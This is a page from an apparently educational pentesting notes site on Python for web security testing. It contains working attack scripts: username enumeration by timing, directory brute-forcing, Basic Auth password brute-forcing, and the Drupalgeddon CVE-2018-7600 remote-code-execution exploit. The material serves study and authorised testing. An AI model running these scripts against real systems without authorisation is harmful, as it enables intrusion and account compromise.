Defender's Notes
  • Welcome!
  • Methodology
  • Ethical Hacking
  • Resources/Blogs/Conferences/Labs
  • Writing Vulnerability Reports
  • Linux Tips
  • Certifications
  • Bug Bounty
    • Hints
  • Python
  • PenTesting
    • Recon
    • Network Scanning
    • Reverse Shell Payloads
    • API Security Testing
    • 53 - DNS
    • 21 - ftp
    • 139,445 - SMB
    • 111,2049 - rcpbind
    • Authentication
    • Scripting
    • OSINT
    • Cloud Security
    • Reverse Engineering
    • Password
    • Proxy Chain
    • Steganography
    • Buffer Overflow
  • Windows
    • Recon
    • Golden/Silver Ticket
    • PowerShell for Beginners
    • Windows Priv Escalate
      • Icecast (RPC)
    • Kerberos Attack
  • Web Pentesting
    • 80,443,8080 - Recon
    • Resources
      • Burp Suite
    • Web Vulnerabilities
      • WordPress
      • CSP Bypass
      • JSON Web Tokens
      • Insecure Desensitization
      • Open Redirect
      • Command Injection
      • Path Traversals
      • SSRF
      • SQL Injection
      • IDOR
      • Shellshock
      • Heartbleed
      • Session Attacks/Bypass
      • XSS
      • XXE
      • CSRF
      • File Inclusion (Local/Remote)
      • Drupal
    • OWASP Top 10 2017
      • Top 1: Injection
      • Top 2: Broken Authentication
      • Top 3: Sensitive Data Exposure
      • Top 4: XML External Entities (XXE)
      • Top 5: Broken Access Control
      • Top 6: Security Misconfiguration
      • Top 7: Cross-Site Scripting (XSS)
      • Top 8: Insecure Deserialization
      • Top 9: Using Components with Known Vulnerabilities
      • Top 10: Insufficient Logging & Monitoring
    • OOB
    • Java
    • Python Web Security
  • Linux
    • Upgrading shell
    • Linux Priv Escalate
      • Path Variable Manipulation
      • Systemctl
  • Binary Security
    • AOT
  • Hardware Security
    • Wi-fi
    • Radio
  • Mobile Security
    • Android
    • SMS
  • Videos
    • IppSec Videos
    • The Cyber Mentor
Powered by GitBook
On this page
  • General Web Libraries
  • Examples
  • GET request and print response (Request lib)
  • GET request and Basic Authentication (Request lib)
  • Py2 - GET request and Basic Authentication (urrlib2 lib)
  • POST request
  • HTTPS GET request with invalid cert
  • Timing username harvesting attack
  • Forced Directory script
  • Drupalgeddon python exploit made by Vitalii Rudnykh https://github.com/a2u/CVE-2018-7600
  • Basic Authentication Brute Force
  • References

Was this helpful?

  1. Web Pentesting

Python Web Security

General Web Libraries

  • urillib

  • uribil2

  • urllib3

  • httplib

  • httplib2

  • Requests (Best)

    • Supports Authentication (Basic,Digest,Kerberos,NTLM,AWS,OAuth1)

    • Handles SSL

    • Export specific header

      • r.headers['server'], r.headers['user-agent']

General Security Libraries

  • scapy (interacting with packets)

  • nmap (network scanner)

  • bs4 (scrape information from web pages)

  • yara (finds patterns within data by strings or regex patterns) (Made by VirusTotal)

Examples

GET request and print response (Request lib)

#!/usr/bin/python3
import requests
r = requests.get('http://www.google.com')
print (r.text)

GET request and Basic Authentication (Request lib)

#!/usr/bin/python3
import requests
r = requests.get('http://www.test.com/basic',auth=('bob','Password1'))
print (r.text)

# Print response status code
print (r.status_code)

# Print all headers as dictionary
print (r.headers)

# Print round-trip time
print (r.elapsed.total_seconds)

Py2 - GET request and Basic Authentication (urrlib2 lib)

#!/usr/bin/python
import urllib2, base64
r = urllib2.Request("http://www.test.com/basic")
b64 = base64.encodestring('%s:%s' %('bob','Password1')).replace('\n', '')
r.add_header("Authorization", "Basic %s" % b64)
result = urllib2.urlopen(r)
print result.read()

POST request

#!/usr/bin/python3
import requests
r = requests.post('http://www.test.com/formauth.php', data={'user':'bob','pass':'Password1','button':'Login'})
print (r.text)

HTTPS GET request with invalid cert

#!/usr/bin/python3
import requests

# Set verify=False to avoid errors for self-signed x.509 certificates
r = requests.get('https://www.test.com/',verify=False)
print (r.text)

Timing username harvesting attack

Use case: Testing timing username harvesting attack against Login page, knowing login (1 letter first name, last name) pattern, we go through alphabet + list of last names we got from OSINT against login page. Script will print request roundtrip time + username so we can see if site is vulnerable to attack.

#!/usr/bin/python3
import requests
# asci_lowercase is the string 'abcdefghijklmnopqrstuvwxyz'
from string import ascii_lowercase

with open('user_dictionary.txt') as f:
    # Following line reads each line of users_dictionary into python list
    # splitlines() removes the newlinses at the end of each line
    lines = f.read().splitlines()

# Loop through each name
for lname in lines:
    for init in ascii_lowercase:
        # Combine letter with last name
        username=init+lname
        
        # Requests
        r = requests.post('http://www.test.com/securelogin.php', data = {'user':username,'pass':'badpass','button':'Login'})
        roundtrip = r.elapsed.total_seconds()
        print (str(roundtrip)+": "+username)

# Following command can be run to sort and show longest roundtrip
# ./script.py | sort -n | tail -15

Forced Directory script

Use case: Script runs through aaa through zzz (17,576 requests) and tries to directory brute force. Will return code and url if a 200 or else is found.

#!/usr/bin/python3
import requests

# ascii_lowercase is the string 'abcdefghijklmnopqrstuvwxyz'
from string import ascii_lowercase

url="http://www.test.com/" # Base URL

for one in ascii_lowercase:
	for two in ascii_lowercase:
		for three in ascii_lowercase:
			# this section will run 17,576 times
			directory=one+two+three # directory will be 'aaa' through 'zzz'
			
			# Request http://www.test.com/aaa (etc...) 
			r = requests.get(url+directory)
			
			# if status code is not "Not Found" (404) print url with status code
			if r.status_code != 404:
				print (url+directory+": "+str(r.status_code))
#!/usr/bin/env python3
import sys
import requests

target = input('Enter target url (example: https://domain.ltd/): ')

# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
# 
# example:
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# verify = False
proxies = {}
verify = True

url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "EXPLOITED" | tee hello.txt'}

r = requests.post(url, proxies=proxies, data=payload, verify=verify)
check = requests.get(target + 'hello.txt', proxies=proxies, verify=verify)
if check.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')

Basic Authentication Brute Force

#!/usr/bin/python3
import requests

char="1234567890!@#\$%\^&\*()_+="
user="ford"
url="http://www.test.com/basic/"

with open('/opt/wordlists/splashdata-worst-passwords-2018.txt') as f:
 passlist = f.read().splitlines()
 for passbase in passlist:
  for char1 in char:
   for char2 in char:
    password = passbase+char1+char2
    r = requests.get(url, auth=(user,password))
    if r.status_code == 200:
     print (str(r.status_code)+": "+user+": "+password)

References

PreviousJavaNextUpgrading shell

Last updated 4 years ago

Was this helpful?

Drupalgeddon python exploit made by Vitalii Rudnykh

ByteScout's Python Web Sec:

https://github.com/a2u/CVE-2018-7600
https://bytescout.com/blog/python-tutorial-web-app-security.html